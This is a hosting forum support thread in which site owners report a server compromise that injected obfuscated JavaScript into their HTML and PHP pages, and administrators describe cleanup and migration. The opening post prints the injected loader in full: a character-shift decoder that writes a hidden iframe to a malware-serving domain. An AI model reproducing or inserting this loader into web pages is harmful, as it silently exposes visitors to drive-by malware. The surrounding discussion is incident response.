FRIHOST FORUMS SEARCH FAQ TOS BLOGS COMPETITIONS
You are invited to Log in or Register a free Frihost Account!


Malicious script I can't seem to get rid of...





wombatrpgs
Hey...

I recently noticed (like, within the hour), this has been popping up all over my webpages:
Code:
var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);

It's descrambling a string... Which happens to be a redirect to an awful lot of trojans and viruses. I've attempted to get rid of the thing from my pages, but I'm getting the "Unable to open file for writing" in Directadmin errors. None of my files cannot be edited or deleted. The UID changed from wombatrp to root for all .html and .php pages, which are all now 644. The script's also in my functions_php with an echo attached to it, but the syntax is bad causing every single page on my forum to malfunction. I changed passwords for all accounts... Few questions:

1 - How do I get this thing off? Is there any way to reset the file permissions at this point...?
2 - How did this get here? I've done a bit of searching and it seems this is some sort of PDF insertion exploit. Not sure. I'm pretty sure the password was secure, anyway...
3 - Is this happening to anyone else? Once again, while searching, I found a bunch of posts with this script just put up today. What's going on here?

Thanks for the help.
Bockman
This seems to be a problem with some accounts on Server2. It has been reported earlier and Bondings is already checking accounts and working on a solution.

Please be patient as we work these things out. I am reporting this post to Bondings so he knows about your situation.

Be Well Cool
rebeltrooper
its the same problem i have, please bondings fix it! Very Happy Very Happy Very Happy
Utopia GFR
Hi,

This is what I'm getting here :

Quote:
Parse error: syntax error, unexpected '=', expecting ',' or ';' in /home/utopiagf/domains/litterature.frih.net/public_html/forum/common.php on line 206
wombatrpgs
Bockman wrote:
This seems to be a problem with some accounts on Server2. It has been reported earlier and Bondings is already checking accounts and working on a solution.


That's good to hear. As long as something's being done I'm all set. Nice to know it wasn't me who screwed up.

Utopia GFR wrote:
Hi,
This is what I'm getting here :
Parse error: syntax error, unexpected '=', expecting ',' or ';' in /home/utopiagf/domains/litterature.frih.net/public_html/forum/common.php on line 206


That's the one. That would be the script's bad javascript syntax. It looks like it was placed in the common.php file which is included on all the other pages, causing the syntax error all over the place. The thing obviously isn't functioning as intended, but it's still annoying the hell out of me.
Liu
Looks like someone compromised the server. ):
Aredon
I am currently unable to edit anything with FTP or Direct Admin on my webpage. When you try to upload and replace in any way it will kick you with an error. So I cannot remove this script from my page, nor can I lock it down so that other people are not hit by whatever it is ment to do Sad.
wombatrpgs
Yeah... Same here. That would be the file permissions thing. I guess whatever it was went through and altered all .html and .php files and gave them 644 permissions?
Liu
wombatrpgs wrote:
Yeah... Same here. That would be the file permissions thing. I guess whatever it was went through and altered all .html and .php files and gave them 644 permissions?

644 permissions are fine - it means the owner can read and write to it. What the malicious user did was a chown using root, therefore instead of it being owned by you, it's owned by root. This is potentially scary because it's very possible that root account has been compromised -- ie the server f'ed.

A quick solution that the admins can do is write a quick script to parse through all files in public_html to remove the malicious code. Then start looking into how the user compromised the system and if they installed a backdoor to prevent it from happening again. It may take awhile.
rvec
probably not the root, anyone with permissions to the files can chown files to root. This is more likely an exploit in direct admin which a hacker(script) used to login to the accounts, edit pages and chown the files to root so the users can't change the files back themselves.
Logging in as root would require the root password, an exploit in the OS or an exploit in a program running under root.
rebeltrooper
is a chinese page, hu1.cn and something, in my blog the redirection is on, but nothing happends, its a trouble.

a real server attack!
wombatrpgs
hu1-hu1.cn is the site. Apparently the failed PDF file it attempts to open is some sort of malware. So, this is a compromise of the individual account or the root account? Or just an exploit through DirectAdmin? This isn't on every single Server2 site, is it?
Utopia GFR
I wonder how many of us are affected by this attack but my forum & blog are down.

Please help us.
cavey
Some more reading about the Bloodhound.Exploit.196:

http://forums.permaculture.org.au/viewtopic.php?f=8&p=45188
http://www.symantec.com/security_response/writeup.jsp?docid=2008-080702-2357-99&tabid=3

I have edited my "public" files now, but hope bondings will come up with a fix that will remove this code from each html/php-file again, and change the ownership(?) of the files, before I go through the rest...
Liu
rvec wrote:
probably not the root, anyone with permissions to the files can chown files to root. This is more likely an exploit in direct admin which a hacker(script) used to login to the accounts, edit pages and chown the files to root so the users can't change the files back themselves.
Logging in as root would require the root password, an exploit in the OS or an exploit in a program running under root.

That's odd - at least on my Linux systems, it will not allow you to chown to root unless you are root. Which is why I suggested root account may be compromised.

On top of this, why is port 22 open on the server to the world wide web?
QrafTee
Yeah, my website is also having the same issue. I believe I'm on Server 2 as well. I can't seem to change my pages at the moment either. Thanks for checking up on this.
cavey
I copied the file I wanted to change to my computer, deleted the file on the server. Edited the local file, and uploaded it again. That worked for me. I could not edit or replace the file on the server.
wombatrpgs
I'm not able to delete files on the server. How did you do this?

Thanks for the links by the way. That first site is what I was referring to in the first post. It seems this is much more wide-spread than Server2; that topic started today.
Aredon
Actually yeah that fix worked for me, I just deleted my entire public_html contents and then uploaded my backup folder (which is completely up to date since I use dreamweaver) and now the script is gone on my site Smile

If we could get word on when it will be secure for me to unlock the website for view by my clan members I would be very grateful.
Bondings
Server 2 indeed has been compromised and malicious javascript was injected to a lot of pages. All .html files, the same for .htm. And most likely also some .tpl and .php files were infected. This seems to have happened to a lot of servers the last day(s). I have no idea yet what made this possible.

I am currently running a script (which is half-through the accounts) that should clean up all the files in question. It might leave some html tags in the wrong place (a <html> at the end), but should remove the script itself. At least hopefully most of it, since a few different ones were used apparently.

I'll most likely be moving the accounts to server 3, during the next few days, if possible, since this might happen again.

I'm really sorry for all the problems this caused.
jylan
Thanks so much Bondings for doing all this, I came on this morning to check my stats to find there hadn't been any since last night and that' not normal, so I loaded up my website and found a php error for a wordpress plugin file. I deleted that plugin and the page loaded fine, but then I saw a request going out to a .cn site in the status bar and knew something was up.

Same as everyone else I found the script and also my files were root permissions so I couldn't change them. I found a lot more information at this page on a blog: http://www.stephanmiller.com/bugs-viruses-backups-and-prevedvsem123cn/. It might be of help to you Bondings. Supposedly the problem is the Layered Tech which Frihost uses.
jylan
Also Frihost.com as down for a while this morning, and I couldn't access any forums. Was that to do with this problem?
wombatrpgs
Yeah, everything's back up again. Thanks a lot, Bondings.
Bondings
jylan wrote:
Also Frihost.com as down for a while this morning, and I couldn't access any forums. Was that to do with this problem?

The /var partition was full again. As always due to the big logs of frihost.com (and the /var partition is not big). I simply have to move the logs and it works again. I'll fix this permanently another time. But this is definitely nothing to worry about.

Thanks for the link. There seems to be more and more information about it luckily. I already found a cleanup script (which I mentioned) and adapted a bit and it finished executing, so most injected code should be gone.

I'll do the other stuff mentioned there to protect the server. Hopefully this should be enough so I don't have to rush to move the accounts and can at least wait until after the weekend.
wombatrpgs
Ugh, sorry to keep complaining... It seems the UID for all htm/html/php files is still root, which means users still can't edit or change the files that were tampered with. It's alright now that the script's gone, but when it comes time to make changes to any of the site, there's not going to be a clean way to do it. I assume your script's done executing without touching this issue? Is there anything to be done about this? I appreciate the effort.
Ghost900
This answers my question I was going to post.

I just tried to upload my site with FTP and it said "Read Only" and so I tried logging into my Direct Admin and it won't let me log in. Sad

As long as I know its not just me I am fine. Smile

If you moved us to server 3 would that change anything for us (Lower PHP or coding)? Or is 2 and 3 almost the same as for PHP scripting?
Liu
My public_html directory is still with permissions 777. It may be a good idea to change this to 755.
Bondings
@Liu, that's probably the symlink, the actual public_html seems to be 755. And normally you should be able to change it in DA.

For the others, yes indeed the files that were infected (and some others too) are still root. Unfortunately if I chown the whole directory, it will also change some files which should have a different group (like email stuff).

If the accounts are moved to a different server, then it seems that the the permissions and usernames are automatically fixed to the right ones. So either I will make a script to fix it on Server 2 or you'll have to wait until the accounts are moved(preferably after the weekend).

Server 2 and Server 3 are pretty much the same I think. They both have DirectAdmin. Server 3 has a newer MySQL if I'm not mistaken. PHP should be mostly the same.

@Ghost900, you should be able to log in. This is probably a different problem. Maybe the server was rebooting at the moment you tried to log in?
Liu
Did my public_html disappear? I can still access it via the web, but I can no longer see it in my directadmin.
wombatrpgs
It would seem that the directory is now automatically within domains or something...? I have the same thing. Oh, and to Bondings, it's not a problem if it takes a while to reset the ownership; it's not as pressing as the script was. Thanks.
Bondings
@Liu, the setup in DirectAdmin is actually domains/<domain_name>/public_html/ . There is however a shortcut (symlink) named public_html to the public_html of the default domain, which you can setup in DirectAdmin itself (when choosing the domain). Sometimes it disappears though, but you should be able to add it back by choosing a default domain in DA. In any case, everything should always be accessible through the longer directory structure, it just takes a bit longer to get at that directory I guess.

Also, please everyone check if you still find any of those injected scripts on your web pages? They can only appear on files owned by root, normally, though. If everything went fine all of them should be gone.

About the hack. What I think happened is that LT (the datacenter) had their CMS changed over a year ago, which probably included the password of server 2. Most likely the passwords were sold or something and the last few days at least tens of servers got hacked. The hackers then used a script to put the malicious javascript code on the websites. Pretty much the same everywhere.

I removed the javascript code with another script I found. (I had to modify it a bit to remove another instance it didn't cover) I also removed the backdoors and changed the password. With a bit of luck everything should be fine now. I might still move the websites to server 3, but without the urgency, rather somewhere during the next week(s).
QrafTee
Is it normal for me to still be unable to edit my pages?
There are still some pages on my DirectAdmin owned by root so I cannot delete or do anything to these pages.
jylan
That's great Bondings, I bet stuff like this would never happen if you owned & managed all the servers instead of other companies Very Happy
inphurno
i was one of the people affected by the attack. i was modifying stuff and then the main page was redirecting to the hu1-hu1.cn site. i thought i really messed things up. Very Happy anyway i wanted to know if there was a reason why only some accounts on server 2 were affected? was there something i did wrong?
QrafTee
inphurno wrote:
i was one of the people affected by the attack. i was modifying stuff and then the main page was redirecting to the hu1-hu1.cn site. i thought i really messed things up. Very Happy anyway i wanted to know if there was a reason why only some accounts on server 2 were affected? was there something i did wrong?

I believe it's all the websites on Server 2. Bondings seemed to removed the malicious scripts, but I don't believe we're able to take control of our websites yet because a lot of our pages are owned by "root" and that stops us from modifying or deleting those pages.
wombatrpgs
Hate to be the bearer of bad news, but it's back. Seriously. This is really starting to irritate me. Bondings, could you run that script again, or would this version require some modification? It seems to identical, down to the string that's being decoded. This is apparently going to remain a constant issue until the accounts are moved.
Arnie
Last Thursday I found such code in a PHP script of mine (http://arnie.frih.net/quotes) and as I didn't have time to investigate, I blocked access to the entire subsite using .htaccess linked to a non-existant .htpasswd. On Friday I checked again and the malicious code (which matched the descriptions given in this topic) was gone. I was still able to edit the files myself so I deleted the entire script although I still have a backup copy on my harddrive. No files were owned by root in my case.

On one hand I'm glad that it wasn't a security leak in my script but on the other hand I'm not exactly thrilled to know the server has been compromised. Perhaps the leak should be fixed instead of removing the symptoms?
wombatrpgs
Yeah, no kidding... So for you it isn't back again now? It seems a different array of accounts on Server2 have been affected then; it looks like a few more people have been adding up topics about this...
Utopia GFR
Back again.

Quote:
Parse error: syntax error, unexpected '=', expecting ',' or ';' in /home/utopiagf/domains/litterature.frih.net/public_html/forum/common.php on line 206


Patience Smile
Arnie
wombatrpgs wrote:
Yeah, no kidding... So for you it isn't back again now? It seems a different array of accounts on Server2 have been affected then; it looks like a few more people have been adding up topics about this...
I just checked and now my index.html is infected and chowned to root.

Here's a suggestion: protect your visitors by locking access to your site using a .htaccess file with the following content:
Code:
AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Site is temporarily closed"
AuthType Basic
<Limit GET POST>
require valid-user
</Limit>
Put it in your public_html directory and all subdirectories will also be secured.
Bondings
I'm really sorry, it seems to have happened again. I guess they came in through some backdoor which I didn't remove. I'm rerunning the script now.
jylan
While this problem is still in the works is there any way thatI can change my files owner back to me instead of root?
QrafTee
jylan wrote:
While this problem is still in the works is there any way thatI can change my files owner back to me instead of root?

That would be great because I haven't been able to edit my pages since it was compromised.
Da Rossa
That's very unfortunate.

My site is experiencing the same wierd problems. I'm using Kompozer (based on NVU) to edit my pages, and I use the built-in FTP function to upload the freshly modified files. Easy.

Today, I got the message, while trying to upload:

Quote:
"550 permission denied"


Then, I tried going manually to my DirectAdmin panel, and upload the files from there. The message was:

Quote:
An Error Occurred

Details

Unable to open /home/darossa/domains/darossa.frih.net/public_html/notas.html for writing

Warning: Saved filesize is less than uploaded filesize. Check quotas.

Click here to go back




After, that, I tried to paste the new html code "in locus", in a manual edit on the DirectAdmin panel itself. The message was:


Quote:
Unable to save your changes

Details

Unable to open /domains/darossa.frih.net/public_html/dir/log.html for writing


darossa Back




Then, finally, I tried via FileZilla 3.1.5, and the message was the simple "Critical error".

What to do?

Observation: while retrying in order to grab the error messages, I got a "Unable to contact [my ip]" from Firefox.
The permissions of the public_html file appear to be 777. Changed to 755 after reading this topic.
The checkboxes for the files under public_html are unavailable, which means that I can't edit or delete the files.
wombatrpgs
Just a thought, nothing I've tried... Try creating a backup of your website, deleting the entire public_html contents, and restoring the backup. Would the files be set back to the original user?
jylan
@wombatrpgs, No I don't think that would work because any files owned by root can't be deleted Sad .
Arnie
Any idea how many accounts there are on server 2? If it would be possible to automatically make a ZIPped backup of each account (like you can do in DirectAdmin) the admins could simply wipe clean and reinstall the entire server (making sure any backdoor is gone as well). Everyone's backup ZIP could then be offered for download during a few months to make sure nobody loses his files, databases and emails.

Just a wild thought. A reinstall would also allow upgrading of all software and scripts to their latest versions.

Edit: I see a reinstall is already being done. Great!
Bondings
@Da Rossa, normally it should work now since the accounts are now on server 3. If you connect to server 3, there should (hopefully) be no error.
catscratches
Great, Bondings!

All the GID is now back to normal. I'll just try to actually edit them...

Edit: Works perfectly!

Thanks a lot!
Da Rossa
Thanks for your calm Bondings!! If I were an admin, I would be pulling off my hair Razz

But my address is still not working. it used to be http://www.darossa.frih.net/notas (where my main site is actually resided, while http://www.darossa.frih.net is only a test page), but it's not working.
@directadmin, I can access my pages, which are with the urls like the following:
Quote:
http://www.frih.org:2222/CMD_FILE_MANAGER/domains/darossa.frih.net/public_html/dir/dct1/direito_const1_01-10-08.html


What is the correct (compact) url?

Thanks!
Bondings
Da Rossa wrote:
Thanks for your calm Bondings!! If I were an admin, I would be pulling off my hair Razz

But my address is still not working. it used to be http://www.darossa.frih.net/notas (where my main site is actually resided, while http://www.darossa.frih.net is only a test page), but it's not working.
@directadmin, I can access my pages, which are with the urls like the following:
Quote:
http://www.frih.org:2222/CMD_FILE_MANAGER/domains/darossa.frih.net/public_html/dir/dct1/direito_const1_01-10-08.html


What is the correct (compact) url?

Thanks!

It's http://darossa.frih.net/dir/dct1/direito_const1_01-10-08.html . You need to take the domain name and after it everything next to public_html.
Da Rossa
Thanks a lot mr. Bondings.

Just a lil question though: I published my class notes site (the one that is widely visited by my friends) as http://www.darossa.frih.net/notas, without the .html in the end, and it's not working; we have to add the .html extension in the url. Can I do something to have it work the compact way?

Tks in advance.
QrafTee
Thanks a lot Bondings... but what's going to happen to Server 2? Shut it down and rename Server 3 to Server 2?
Bondings
@Da Rossa, you can do that with a .htaccess file, but please create another topic for that.

@QrafTee, I don't know yet. Maybe I'll transfer the accounts back, maybe not. Maybe I'll close it, maybe put it back as a new server or maybe even something else. I still have to decide. But first finish to clean up the mess. Wink
Arnie
You could make it a dedicated Frihost gaming server.
wombatrpgs
As long as there are no html or php files, I suppose it can be left vulnerable... Not that that's a good thing, but if can't be fixed, it's a shame not to use it.
Bondings
wombatrpgs wrote:
As long as there are no html or php files, I suppose it can be left vulnerable... Not that that's a good thing, but if can't be fixed, it's a shame not to use it.

Of course it will be used. I'm going to format the disk and put a new OS on it. I just haven't decided yet how to use it.
inphurno
are we going to stay on server 3? the newer version of mysql would be great Very Happy
Bondings
inphurno wrote:
are we going to stay on server 3? the newer version of mysql would be great Very Happy

If I move the accounts back to server 2, there is no reason to downgrade again. It would then also be a new version of mysql. Maybe an even newer one.
Da Rossa
Edit: damn, I though I created another topic Razz
cavey
Could you delete the files from the old server? My domain is still pointing at it (and I can not change it for a few days), and this #%& gave me a virus or something :/
bloodrider
I'm having the same problems exposed here in the previous posts. I would like to remove that script from my pages, but I don't have access Crying or Very sad
The solution will be our accounts being moved to the server 3?
Mr. Bondings, probably you don't have that much time but can you at least give us a prevision of when will be our accounts moved?

A question, can our (users) passwords be compromised?
Aredon
I believe what I ended up doing was logging onto my ftp and deleting everything, and then uploading from a backup. That seemed to work. Since we've moved to server three though I haven't had any problems. Smile
Arnie
Apparently the compromised server 2 is still up, although frih.net doesn't point there anymore. Is there anything hindering a simple "mke2fs" command on server 2 ??
Bondings
I still need some data on server 2, so that's why it isn't reformatted/os-reinstalled yet. Afterwards I'll probably use it - at first - for the Frihost website and forums.

Also please don't keep your domain on server 2 in any circumstances, but instead use the new account on server 3!
wombatrpgs
By the way, is the max file upload size different on Server 3? I didn't think it was 10 MB before... I could be wrong.
Insanity
I have the same problem. When I access my website, Firefox tells me there's a malicious script running on that page. But when I check the source code for my site, there's nothing strange or unusual on it. I requested a review from Google, but came back with the same results. Anyone have any ideas?

The site is: http://www.genericists.com/
Bondings
Insanity wrote:
I have the same problem. When I access my website, Firefox tells me there's a malicious script running on that page. But when I check the source code for my site, there's nothing strange or unusual on it. I requested a review from Google, but came back with the same results. Anyone have any ideas?

The site is: http://www.genericists.com/

Yes the script is still there! Please change the ip address of your domain to 64.92.163.26. Your domain is still pointing to server 2.[/quote]
Insanity
Oh thanks, I just realized that I had forgotten to change the A record when I thought I did. I'll request another review to Google.
Aredon
So what will become of poor old server two? Sad
Bondings
Aredon wrote:
So what will become of poor old server two? Sad

I still need it for some files/backups at the moment. Afterwards I will put a new OS on it, secure it and use it again. Most likely for the frihost.com (this) website at first.
wombatrpgs
Would that overhaul increase the overall security...? (Apparently I don't understand how this happened anyway) Or maybe just leave it for a while to make sure of no other attacks?
nivinjoy
Some one tell me when this problem will be completely solved...so that i can start working on creating a website, a blog and forum in my account...!!

Last week i installed a wordpress blog in my account and then soon i noticed that there were some unwanted scripts..!! So i deleted the blog and now i wanna create website in my account...!!

So Admins or moderators please tell me when this problem will be completely solved....!!!! Question Question
Bondings
nivinjoy wrote:
Some one tell me when this problem will be completely solved...so that i can start working on creating a website, a blog and forum in my account...!!

Last week i installed a wordpress blog in my account and then soon i noticed that there were some unwanted scripts..!! So i deleted the blog and now i wanna create website in my account...!!

So Admins or moderators please tell me when this problem will be completely solved....!!!! Question Question

It is solved. I moved all accounts to server 3. Please use that account and all should be ok.
nivinjoy
Bondings wrote:
nivinjoy wrote:
Some one tell me when this problem will be completely solved...so that i can start working on creating a website, a blog and forum in my account...!!

Last week i installed a wordpress blog in my account and then soon i noticed that there were some unwanted scripts..!! So i deleted the blog and now i wanna create website in my account...!!

So Admins or moderators please tell me when this problem will be completely solved....!!!! Question Question

It is solved. I moved all accounts to server 3. Please use that account and all should be ok.


Thank You Bondings..!! I will start the work as soon as possible...!!
nivinjoy
It was great of you to solve the problem...!! But let me tell you something...!! The Squirrel mail is not working properly...!! And also what about Round Cube...???

Hope you will solve these problems also very soon...!!
Arnie
There's a topic about the mail problems, please post there to bring it to attention...
http://www.frihost.com/forums/vt-99901.html
Related topics
cpanel q: Doesn't seem to be a firewall issue
Virus Problem
Script Yard
Need help with php script
simple login script
Access denied as Admin in phpNuke
lost images - resolved
Suspended?
sscvihost problem
Unable to access to frihost
Is there any way to use server 2?
ESET NOD32 Block Frihost Form Topic
location of php in frih.net
You too may be the victim of this Virus
Reply to topic    Frihost Forum Index -> Support and Web Hosting -> Web Hosting Support

FRIHOST HOME | FAQ | TOS | ABOUT US | CONTACT US | SITE MAP
© 2005-2011 Frihost, forums powered by phpBB.